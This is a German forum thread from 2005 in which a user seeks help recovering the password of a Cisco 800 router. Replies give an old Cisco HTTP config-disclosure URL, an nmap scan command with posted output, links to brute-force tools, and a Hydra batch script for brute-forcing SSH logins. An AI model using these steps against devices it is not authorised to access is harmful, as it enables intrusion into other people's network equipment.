PW's rausfinden...

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von drdead, 5. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 5. August 2005
    Hy, suche halt ein Prog mit dem ich das PW eines lokalen Cisco Routers rauskrieg, habe John the Ripper und Hydra, aber damit kann ich nichts anfangen....
    Suche was mit'ner Benutzeroberfläche. Oder halt eine für ein's der Proggis.
     
  2. 5. August 2005
    Also John the Ripper startest du über die eingeabe aufforderung.

    erstell ein ne Textdatei in dem Ordner wos is und schreib "cmd" rein ohne "

    dann benneste se in john.bat um öffnest se und schon biste im ordner und startest john the ripper

    greetz ;;;@alpha
     
  3. 5. August 2005
    Wenn du das PW über nen Webinterface eingeben musst, dann kann ich dir wwwhack oder AccessDiver empfehlen.



    MFG,
    N3T.Dr4g0n
     
  4. 5. August 2005
    aber soviel ich weiss kannst mit access diver doch nur memberbereiche knacken ned? ...
     
  5. 5. August 2005
    ;;;@alpha na dolle, so weit war ich auch, aber man muss ja alle möglichen Parameter u.s.w. eingeben und ich hab 0 Ahnung, die ReadMe's halfen net, da sie auf english waren, selbst auf deutsch hätten sie nix genützt. ^^

    Man kann das Login NICHT über ein WebInterFace eingeben.
    Es ist ein Cisco 800 Series
     
  6. 5. August 2005
    1.] John the Ripper ist hier nicht zu gebrauchen, da er nur md5 Hashes knacken kann (oder halt NTLM...) aber, da Cisco einen eigenen Algorithmus verwendet kommt er hier nicht in Frage.

    Wichtig wären ein Paar Daten:
    Version des Routers?
    Wie alt?
    Welche Firmware?

    Was kommt wenn du folgendes in den Browser eingibst:
    http://[IP-Adresse-des-Routers]/level/99/exec/show/config

    Wenn du das alles nicht weißt kannst du den Rechner nur versuchen per Bruteforce zu knacken.
    1. mach einen Portscan:
    und guck ob Telnet am Router verfügbar ist. Da bei Telnet oft dann nur das PW abgefragt wird und du somit nur einen Anfrage machen muss anstatt USER / PASS, was natürlich dann auch nur die halbe Zeit in Anspruch nimmt.

    [welche Dienste laufen sonst noch]
     
  7. 5. August 2005
    Wenn du bereit wärst den Router neu zu konfigruieren, dann einfach ca 10 Sekunden lang den Reset am Router drücken.
    Dann ist das PW zurückgesetzt (00000, Admin, Cisco, ...) aber auch alle Einstellungen verloren.

    Wie gesagt wwwhack kann auch Form-Logins knacken, einfach mal ausprobieren...


    MFG,
    N3T.Dr4g0n
     
  8. 5. August 2005
    @xodox also wie oben schon steht ein CISCO 800 Series...
    http://172.16.0.254/level/99/exec/show/config
    Bringt sehr schnell: Die Seite kann nicht angezeigt werden.

    Hmm ja, hört sich gut an, aber ich weiss echt nicht wie ich was machen soll. ^^
    vllt. 'nen paar Tuts verlinken
     
  9. 5. August 2005
    http://rapidshare.de/files/3673020/brutus-aet2.rar.html
     
  10. 5. August 2005
    Unable to verify target...
     
  11. 5. August 2005
    Läuft Telnet überhaut? (war ja nur ein Bsp.)
    Manche Router werden auch über ssh oder radmin konfiguriert..
    (mach einfach mal mit nmap [http://www.insecure.org/nmap] einen Portscan und poste die Ergebnisse hier.
    nmap -sV -sR -A -O -vv -P0 -F [ip] -oN output.txt
     
  12. 5. August 2005
    Es war SSH

    # nmap 3.81 scan initiated Fri Aug 05 16:18:56 2005 as: nmap -sV -sR -A -O -vv -P0 -F -oN output.txt 172.16.0.254
    Interesting ports on 172.16.0.254:
    (The 1220 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE VERSION
    22/tcp open ssh Cisco SSH 1.25 (protocol 1.5)
    MAC Address: 00:B0:C2:8F:63 9 (Cisco Systems)
    Device type: broadband router|router
    Running: Cisco embedded, Cisco IOS 12.X
    OS details: Cisco Soho 97 router running IOS 12.3(8), Cisco 837 router running IOS 12.3(11)T, Cisco router running IOS 12.3(6) - 12.3(10)
    OS Fingerprint:
    TSeq(Class=TR%IPID=Z%TS=U)
    T1(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=ME)
    T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
    T3(Resp=N)
    T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
    T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
    PU(Resp=Y%DF=N%TOS=C0%IPLEN=38%RIPTL=148%RIPCK=E%UCK=E%ULEN=134%DAT=E)

    TCP Sequence Prediction: Class=truly random
    Difficulty=9999999 (Good luck!)
    TCP ISN Seq. Numbers: 54E1F468 2173443C ABC187C7 19A180A3 E79235AD D5FB945D
    IPID Sequence Generation: All zeros

    # Nmap run completed at Fri Aug 05 16:19:02 2005 -- 1 IP address (1 host up) scanned in 6.219 seconds
     
  13. 5. August 2005
    http://thc.org/thc-hydra/
    http://thc.org/thc-hydra/hydra-4.7-win.zip
    irgendwas.bat erstellen mit folgendem Inhalt:

    ---snip---
    @echo off
    hydra -l[loginname] -P[passwordliste] -s22 -f -oresults.txt [ip] ssh2
    PAUSE
    ---snip---
    Oder ohne Username:
    ---snip---
    @echo off
    hydra -l -en -P[passwordliste] -s22 -f -oresults.txt [ip] ssh2
    PAUSE
    ---snip---

    speichern und per Doppelklick auf die irgendwas.bat starten.
     
  14. 5. August 2005
    Also danke das du dich so um mich kümmerst. ^^
    Aber es geht immer noch net, habe die IP eingesetzt und 'ne .bat im Hydra Ordner gemacht:

    Error: Compiled without LIBSSH support, module not avaible!

    Habe Hydra normal geladen und entpackt...
    Ob ich die IP mit oder ohne eckige Klammer hab macht keinen Unterschied!
     
  15. 5. August 2005
    Ohne die [ ].
    Installier http://sshwindows.sourceforge.net/.
    (ps wurde mit libssh kompiliert..)

    direktlink
    http://kent.dl.sourceforge.net/sourceforge/sshwindows/setupssh381-20040709.zip
     
  16. 5. August 2005
    Immer noch derselbe Fehler, hab OpenSSH installiert und anhand der quickstart.txt konfiguriert und gestartet... nichts ändert sich.
     
  17. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.